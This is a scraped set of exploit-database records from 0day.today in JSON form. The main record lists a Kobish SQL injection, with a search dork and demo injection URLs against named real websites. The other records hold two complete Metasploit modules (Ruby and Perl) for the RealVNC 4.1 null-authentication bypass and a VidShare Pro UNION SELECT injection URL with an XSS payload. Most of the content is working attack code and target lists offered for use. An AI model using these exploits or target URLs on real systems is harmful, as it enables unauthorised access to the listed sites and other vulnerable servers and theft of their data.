{"id": "1337DAY-ID-20107", "bulletinFamily": "exploit", "title": "Kobish sql injection Vulnerability", "description": "Exploit for asp platform in category web applications", "published": "2013-01-07T00:00:00", "modified": "2013-01-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/20107", "reporter": "The Black Devils", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-04-04T15:37:14", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for asp platform in category web applications", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T00:13:47", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "hash": "215103afb0d84224a22629cd09baf5caf3d035e7471895187d766d9954b7b811", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "af45deb26e8c23fcb3a01773d6d77b77", "key": "reporter"}, {"hash": "1907f91fa8b6c574bb0f03fec18521fd", "key": "sourceData"}, {"hash": "074e8ea088ed1f68313f4fbaaba223f5", "key": "sourceHref"}, {"hash": "10b02b70e3ef9d8e94c118b58751ba00", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "3361400a2a1154d78a264800f3ed6e07", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "101b7284092e44eb79b50c654f2b8df1", "key": "modified"}, {"hash": "101b7284092e44eb79b50c654f2b8df1", "key": "published"}, {"hash": "087a30ec07604e839bc297281ea2486d", "key": "description"}], "history": [], "href": "http://0day.today/exploit/description/20107", "id": "1337DAY-ID-20107", "lastseen": "2016-04-20T00:13:47", "modified": "2013-01-07T00:00:00", "objectVersion": "1.0", "published": "2013-01-07T00:00:00", "references": [], "reporter": "The Black Devils", "sourceData": "#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\r\n# _ __ __ __ #\r\n# /' \\ __ /'__`\\ /\\ \\__ /'__`\\ #\r\n# /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ #\r\n# \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ #\r\n# \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ #\r\n# \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ #\r\n# \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ #\r\n# \\ \\____/ >> Exploit database separated by exploit #\r\n# \\/___/ type (local, remote, DoS, etc.) #\r\n# #\r\n# [+] Site : 1337day.com #\r\n# [+] Support e-mail : submit[at]1337day.com #\r\n# #\r\n# ######################################### #\r\n# I'm The Black Devils member from Inj3ct0r Team #\r\n# ######################################### #\r\n#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-#\r\n# Exploit Title: Kobish sql injection Vulnerability\r\n# Date: 03/01/2013\r\n# Author: The Black Devils\r\n# Home: 1337day Exploit DataBase 1337day.com\r\n# Category : [ webapps ]\r\n# Dork : Kobish.com inurl:gallery.asp?**=\r\n# Type : php\r\n# Tested on: [Windows] & [Ubuntu]\r\n#------------------\r\n\r\nExploit\r\nhttp://LocalHost/gallery.asp?**= [sql injection]\r\n\r\n\r\n\r\nDemo\r\nhttp://www.galoriental.co.il/gallery.asp?nodeID='340\r\nhttp://www.electropublic.org/gallery.asp?deal_id='41\r\nhttp://www.s-zemach.co.il/gallery.asp?nodeID='373\r\nhttp://82.166.151.50/gallery.asp?nodeID='300\r\nhttp://www.fomexline.com/en/gallery.asp?Page='2\r\n#------------------\r\nContact:\r\nhttps://www.facebook.com/DevilsDz\r\nhttps://www.facebook.com/necesarios\r\n#------------------\n\n# 0day.today [2016-04-19] #", "sourceHref": "http://0day.today/exploit/20107", "title": "Kobish sql injection Vulnerability", "type": "zdt", "viewCount": 0}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T00:13:47"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "087a30ec07604e839bc297281ea2486d"}, {"key": "href", "hash": "c5b836ad0fe6133a2068a48c88be80cb"}, {"key": "modified", "hash": "101b7284092e44eb79b50c654f2b8df1"}, {"key": "published", "hash": "101b7284092e44eb79b50c654f2b8df1"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "af45deb26e8c23fcb3a01773d6d77b77"}, {"key": "sourceData", "hash": "381af2084073366e164ebdbd1afe037d"}, {"key": "sourceHref", "hash": "ecdab81e3168d01a9aecb812e85db64f"}, {"key": "title", "hash": "10b02b70e3ef9d8e94c118b58751ba00"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "25c0080fe41a8f64e18d7d4082e672ce84cc50bc9d414d9d8d8957c8c2acad67", "viewCount": 0, "enchantments": {"vulnersScore": 7.5}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/20107", "sourceData": "#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\r\n# _ __ __ __ #\r\n# /' \\ __ /'__`\\ /\\ \\__ /'__`\\ #\r\n# /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ #\r\n# \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ #\r\n# \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ #\r\n# \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ #\r\n# \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ #\r\n# \\ \\____/ >> Exploit database separated by exploit #\r\n# \\/___/ type (local, remote, DoS, etc.) #\r\n# #\r\n# [+] Site : 1337day.com #\r\n# [+] Support e-mail : submit[at]1337day.com #\r\n# #\r\n# ######################################### #\r\n# I'm The Black Devils member from Inj3ct0r Team #\r\n# ######################################### #\r\n#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-#\r\n# Exploit Title: Kobish sql injection Vulnerability\r\n# Date: 03/01/2013\r\n# Author: The Black Devils\r\n# Home: 1337day Exploit DataBase 1337day.com\r\n# Category : [ webapps ]\r\n# Dork : Kobish.com inurl:gallery.asp?**=\r\n# Type : php\r\n# Tested on: [Windows] & [Ubuntu]\r\n#------------------\r\n\r\nExploit\r\nhttp://LocalHost/gallery.asp?**= [sql injection]\r\n\r\n\r\n\r\nDemo\r\nhttp://www.galoriental.co.il/gallery.asp?nodeID='340\r\nhttp://www.electropublic.org/gallery.asp?deal_id='41\r\nhttp://www.s-zemach.co.il/gallery.asp?nodeID='373\r\nhttp://82.166.151.50/gallery.asp?nodeID='300\r\nhttp://www.fomexline.com/en/gallery.asp?Page='2\r\n#------------------\r\nContact:\r\nhttps://www.facebook.com/DevilsDz\r\nhttps://www.facebook.com/necesarios\r\n#------------------\n\n# 0day.today [2018-04-04] #"}

{"result": {"zdt": [{"lastseen": "2018-01-02T13:14:08", "references": [], "description": "Exploit for windows platform in category remote exploits", "edition": 2, "reporter": "metasploit", "published": "2011-08-26T00:00:00", "title": "RealVNC Authentication Bypass", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-02T13:14:08", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2011-08-26T00:00:00", "id": "1337DAY-ID-16764", "href": "https://0day.today/exploit/description/16764", "sourceData": "##\r\n# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $\r\n##\r\n \r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\n \r\nclass Metasploit3 < Msf::Auxiliary\r\n include Msf::Exploit::Remote::Tcp\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'RealVNC Authentication Bypass',\r\n 'Description' => %q{\r\n This module exploits an Authentication Bypass Vulnerability\r\n in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy\r\n listener on LPORT and proxies to the target server\r\n \r\n The AUTOVNC option requires that vncviewer be installed on\r\n the attacking machine. This option should be disabled for Pro\r\n },\r\n 'Author' =>\r\n [\r\n 'hdm', #original msf2 module\r\n 'TheLightCosine <thelightcosine[at]gmail.com>'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Version' => '$Revision: 13641 $',\r\n 'References' =>\r\n [\r\n ['BID', '17978'],\r\n ['OSVDB', '25479'],\r\n ['URL', 'http://secunia.com/advisories/20107/'],\r\n ['CVE', 'CVE-2006-2369'],\r\n ],\r\n 'DisclosureDate' => 'May 15 2006'))\r\n \r\n register_options(\r\n [\r\n OptAddress.new('RHOST', [true, 'The Target Host']),\r\n OptPort.new('RPORT', [true, \"The port the target VNC Server is listening on\", 5900 ]),\r\n OptPort.new('LPORT', [true, \"The port the local VNC Proxy should listen on\", 5900 ]),\r\n OptBool.new('AUTOVNC', [true, \"Automatically Launch vncviewer from this host\", true])\r\n ], self.class)\r\n end\r\n \r\n def run\r\n #starts up the Listener Server\r\n print_status(\"starting listener\")\r\n listener = Rex::Socket::TcpServer.create(\r\n 'LocalHost' => '0.0.0.0',\r\n 'LocalPort' => datastore['LPORT'],\r\n 'Context' => { 'Msf' => framework, 'MsfExploit' => self }\r\n )\r\n \r\n #If the autovnc option is set to true this will spawn a vncviewer on the lcoal machine\r\n #targetting the proxy listener.\r\n if (datastore['AUTOVNC'])\r\n unless (check_vncviewer())\r\n print_error(\"vncviewer does not appear to be installed, exiting!!!\")\r\n return nil\r\n end\r\n print_status(\"Spawning viewer thread\") \r\n view = framework.threads.spawn(\"VncViewerWrapper\", false) {\r\n system(\"vncviewer 127.0.0.1::#{datastore['LPORT']}\")\r\n }\r\n end\r\n \r\n #Establishes the connection between the viewier and the remote server\r\n client = listener.accept\r\n add_socket(client)\r\n \r\n s = Rex::Socket::Tcp.create(\r\n 'PeerHost' => datastore['RHOST'],\r\n 'PeerPort' => datastore['RPORT'],\r\n 'Timeout' => 1\r\n )\r\n add_socket(s)\r\n serverhello = s.gets\r\n unless serverhello.include? \"RFB 003.008\"\r\n print_error(\"The VNCServer is not vulnerable\")\r\n return\r\n end\r\n \r\n #MitM attack on the VNC Authentication Process\r\n client.puts(serverhello)\r\n clienthello = client.gets\r\n s.puts(clienthello)\r\n authmethods = s.recv(2)\r\n print_status(\"Auth Methods Recieved. Sending Null Authentication Option to Client\")\r\n client.write(\"\\x01\\x01\")\r\n client.recv(1)\r\n s.write(\"\\x01\")\r\n s.recv(4)\r\n client.write(\"\\x00\\x00\\x00\\x00\")\r\n \r\n #handles remaining proxy operations between the two sockets\r\n closed = false\r\n while(closed == false)\r\n sockets =[]\r\n sockets << client\r\n sockets << s\r\n selected = select(sockets,nil,nil,0)\r\n #print_status (\"Selected: #{selected.inspect}\")\r\n unless selected.nil?\r\n if selected[0].include?(client)\r\n #print_status(\"Transfering from client to server\")\r\n begin\r\n data = client.sysread(8192)\r\n if data.nil?\r\n print_error(\"Client Closed Connection\")\r\n closed = true\r\n else\r\n s.write(data)\r\n end\r\n rescue\r\n print_error(\"Client Closed Connection\")\r\n closed = true\r\n end\r\n end\r\n if selected[0].include?(s)\r\n #print_status(\"Transfering from server to client\")\r\n begin\r\n data = s.sysread(8192)\r\n if data.nil?\r\n print_error(\"Server Closed Connection\")\r\n closed = true\r\n else\r\n client.write(data)\r\n end\r\n rescue\r\n closed = true\r\n end\r\n end\r\n end\r\n end\r\n \r\n #Garbage Collection\r\n s.close\r\n client.close\r\n print_status(\"Listener Closed\")\r\n \r\n if (datastore['AUTOVNC'])\r\n view.kill\r\n print_status(\"Viewer Closed\")\r\n end\r\n end\r\n \r\n def check_vncviewer\r\n vnc =\r\n Rex::FileUtils::find_full_path('vncviewer') ||\r\n Rex::FileUtils::find_full_path('vncviewer.exe')\r\n if (vnc)\r\n return true\r\n else\r\n return false\r\n end\r\n end\r\nend\r\n\r\n\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16764"}, {"lastseen": "2018-03-14T02:39:05", "references": [], "description": "Exploit for unknown platform in category web applications", "edition": 2, "reporter": "Snakespc", "published": "2009-05-19T00:00:00", "title": "VidShare Pro (SQL/XSS) Multiple Remote Vulnerabilities", "type": "zdt", "enchantments": {"score": {"modified": "2018-03-14T02:39:05", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "value": 5.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-05-19T00:00:00", "id": "1337DAY-ID-5208", "href": "https://0day.today/exploit/description/5208", "sourceData": "======================================================\r\nVidShare Pro (SQL/XSS) Multiple Remote Vulnerabilities\r\n======================================================\r\n\r\n\r\n---------------------------------------------------------------------------\r\nVidShare Pro MULTIPLE REMOTE VULNERABILITIES\t\r\n---------------------------------------------------------------------------\r\nDiscovered By: Snakespc ALGERIAN HaCkEr \r\n---------------------------------------------------------------------------\r\n\r\nScript:VidShare Pro www.omnisoftsol.com\r\n\r\nDemo:http://www.omnisoftsol.com/index.php?option=com_content&task=view&id=7&Itemid=28\r\n\r\n(listing_video.php)\r\n----------------------------------------------------------------------------\r\nExploit:SQL\r\n--------\r\nDemo:\r\nhttp://demo.omnisoftsol.com/listing_video.php?catid=2+UNION%20SELECT%201,2,3,4,CHAR(83,%20110,%2097,%20107,%20101,%20115,%2084,%20101,%2097,%2077),6,7,8,9,10,11,concat(@@version,0x3a,user(),0x3a,database()),13,14,15,16,17,18--\r\n\r\n(XSS)<----Search form---->\r\n\r\n<script>alert(1954)</script>\r\n-----------------------------------------------------------------------------\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5208"}, {"lastseen": "2018-03-20T00:17:58", "references": [], "description": "Exploit for multiple platform in category remote exploits", "edition": 2, "reporter": "H D Moore", "published": "2006-05-15T00:00:00", "title": "RealVNC 4.1.0 - 4.1.1 (Null Authentication) Auth Bypass Exploit (meta)", "type": "zdt", "enchantments": {"score": {"modified": "2018-03-20T00:17:58", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-05-15T00:00:00", "id": "1337DAY-ID-8707", "href": "https://0day.today/exploit/description/8707", "sourceData": "======================================================================\r\nRealVNC 4.1.0 - 4.1.1 (Null Authentication) Auth Bypass Exploit (meta)\r\n======================================================================\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be redistributed\r\n# according to the licenses defined in the Authors field below. In the\r\n# case of an unknown or missing license, this file defaults to the same\r\n# license as the core Framework (dual GPLv2 and Artistic). The latest\r\n# version of the Framework can always be obtained from metasploit.com.\r\n##\r\n\r\npackage Msf::Exploit::realvnc_41_bypass;\r\n\r\nuse strict;\r\nuse base \"Msf::Exploit\";\r\nuse Pex::Text;\r\nuse IO::Socket::INET;\r\nuse POSIX;\r\n\r\nmy $advanced = {};\r\nmy $info =\r\n {\r\n\t'Name' => 'RealVNC 4.1 Authentication Bypass',\r\n\t'Version' => '$Revision: 1.1 $',\r\n\t'Authors' => [ 'H D Moore <hdm[at]metasploit.com>' ],\r\n\t'Description' =>\r\n\t Pex::Text::Freeform(qq{\r\n\t\tThis module exploits an authentication bypass flaw in version\r\n\t4.1.0 and 4.1.1 of the RealVNC service. This module acts as a proxy\r\n\tbetween a VNC client and a vulnerable server. Credit for this should\r\n\tgo to James Evans, who spent the time to figure this out after RealVNC\r\n\treleased a binary-only patch.\r\n}),\r\n\r\n\t'Arch' => [ ],\r\n\t'OS' => [ ],\r\n\t'Priv' => 0,\r\n\r\n\t'UserOpts' =>\r\n\t {\r\n\t\t'LPORT' => [ 1, 'PORT', 'The local VNC listener port', 5900 ],\r\n\t\t'LHOST' => [ 1, 'HOST', 'The local VNC listener host', \"0.0.0.0\" ],\r\n\t\t'RPORT' => [ 1, 'PORT', 'The remote VNC target port', 5900 ],\r\n\t\t'RHOST' => [ 1, 'HOST', 'The remote VNC target host'],\r\n\t\t'AUTOCONNECT' => [1, 'DATA', 'Automatically launch vncviewer', 1],\r\n\t },\r\n\r\n\t'Refs' =>\r\n\t [\r\n\t\t['URL', 'http://secunia.com/advisories/20107/']\r\n\t ],\r\n\r\n\t'DefaultTarget' => 0,\r\n\t'Targets' =>\r\n\t [\r\n\t\t[ 'RealVNC' ],\r\n\t ],\r\n\r\n\t'Keys' => [ 'realvnc' ],\r\n\r\n\t'DisclosureDate' => 'May 15 2006',\r\n };\r\n\r\nsub new\r\n{\r\n\tmy $class = shift;\r\n\tmy $self;\r\n\r\n\t$self = $class->SUPER::new(\r\n\t\t{\r\n\t\t\t'Info' => $info,\r\n\t\t\t'Advanced' => $advanced,\r\n\t\t},\r\n\t\t@_);\r\n\r\n\treturn $self;\r\n}\r\n\r\nsub Exploit\r\n{\r\n\tmy $self = shift;\r\n\tmy $server = IO::Socket::INET->new(\r\n\t\tLocalHost => $self->GetVar('LHOST'),\r\n\t\tLocalPort => $self->GetVar('LPORT'),\r\n\t\tReuseAddr => 1,\r\n\t\tListen => 1,\r\n\t\tProto => 'tcp');\r\n\tmy $client;\r\n\r\n\t# Did the listener create fail?\r\n\tif (not defined($server))\r\n\t{\r\n\t\t$self->PrintLine(\"[-] Failed to create local VNC listener on \" . $self->GetVar('SSHDPORT'));\r\n\t\treturn;\r\n\t}\r\n\r\n\tif ($self->GetVar('AUTOCONNECT') =~ /^(T|Y|1)/i) {\r\n \tif (! fork()) {\r\n \tsystem(\"vncviewer 127.0.0.1::\".$self->GetVar('LPORT'));\r\n \texit(0);\r\n \t}\t\t\r\n\t}\r\n\r\n\t$self->PrintLine(\"[*] Waiting for VNC connections to \" . $self->GetVar('LHOST') . \":\" . $self->GetVar('LPORT') . \"...\");\r\n\r\n\twhile (defined($client = $server->accept()))\r\n\t{\r\n\t\t$self->HandleVNCClient(fd => Msf::Socket::Tcp->new_from_socket($client));\r\n\t}\r\n\r\n\treturn;\r\n}\r\n\r\n# Stolen from InjectVNCStage.pm\r\nsub HandleVNCClient\r\n{\r\n\tmy $self = shift;\r\n\tmy ($fd) = @{{@_}}{qw/fd/};\r\n\tmy $rhost;\r\n\tmy $rport;\r\n\r\n\t# Set the remote host information\r\n\t($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);\r\n\r\n\t# Create a connection to the target system\r\n\tmy $s = Msf::Socket::Tcp->new(\r\n\t\t'PeerAddr' => $self->GetVar('RHOST'),\r\n\t\t'PeerPort' => $self->GetVar('RPORT'),\r\n\t\t'SSL' => $self->GetVar('SSL')\r\n\t);\r\n\t\r\n\tif ($s->IsError) {\r\n\t\t$self->PrintLine('[*] Could not connect to the target VNC service: ' . $s->GetError);\r\n\t\t$fd->Close;\r\n\t\treturn;\r\n\t}\r\n\t\r\n\tmy $res = $s->Recv(-1, 5);\r\n\t\r\n\t# Hello from server\r\n\tif ($res !~ /^RFB 003\\.008/) {\r\n\t\t$self->PrintLine(\"[*] The remote VNC service is not vulnerable\");\r\n\t\t$fd->Close;\r\n\t\t$s->Close;\r\n\t\treturn;\r\n\t}\r\n\t# Send it to the client\r\n\t$fd->Send($res);\r\n\t\r\n\t# Hello from client\r\n\t$res = $fd->Recv(-1, 5);\r\n\tif ($res !~ /^RFB /) {\r\n\t\t$self->PrintLine(\"[*] The local VNC client appears to be broken\");\r\n\t\t$fd->Close;\r\n\t\t$s->Close;\r\n\t\treturn;\r\n\t}\r\n\t# Send it to the server\r\n\t$s->Send($res);\r\n\t\r\n\t# Read the authentication methods from the server\r\n\t$res = $s->Recv(-1, 5);\r\n\t\r\n\t# Tell the client that the server only supports NULL auth\r\n\t$fd->Send(\"\\x01\\x01\");\r\n\t\r\n\t# Start pumping data between the client and server\r\n\tif (! fork()) {\r\n\t\t$self->PrintLine(\"[*] Proxying data between the connections...\");\r\n\t\t$self->VNCProxy($s->Socket, $fd->Socket);\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\nsub VNCProxy {\r\n my $self = shift;\r\n my $srv = shift;\r\n my $cli = shift;\r\n\r\n foreach ($srv, $cli) {\r\n $_->blocking(1);\r\n $_->autoflush(1);\r\n }\r\n\r\n my $selector = IO::Select->new($srv, $cli);\r\n\r\n LOOPER:\r\n while(1) {\r\n my @ready = $selector->can_read;\r\n foreach my $ready (@ready) {\r\n if($ready == $cli) {\r\n my $data;\r\n $cli->recv($data, 8192);\r\n last LOOPER if (! length($data)); \r\n last LOOPER if(!$srv || !$srv->connected);\r\n eval { $srv->send($data); };\r\n last LOOPER if [email\u00a0protected];\r\n }\r\n elsif($ready == $srv) {\r\n my $data;\r\n $srv->recv($data, 8192);\r\n last LOOPER if(!length($data));\r\n last LOOPER if(!$cli || !$cli->connected);\r\n eval { $cli->send($data); };\r\n last LOOPER if [email\u00a0protected];\r\n }\r\n }\r\n }\r\n}\r\n\r\n\r\n1;\r\n\r\n\r\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8707"}]}}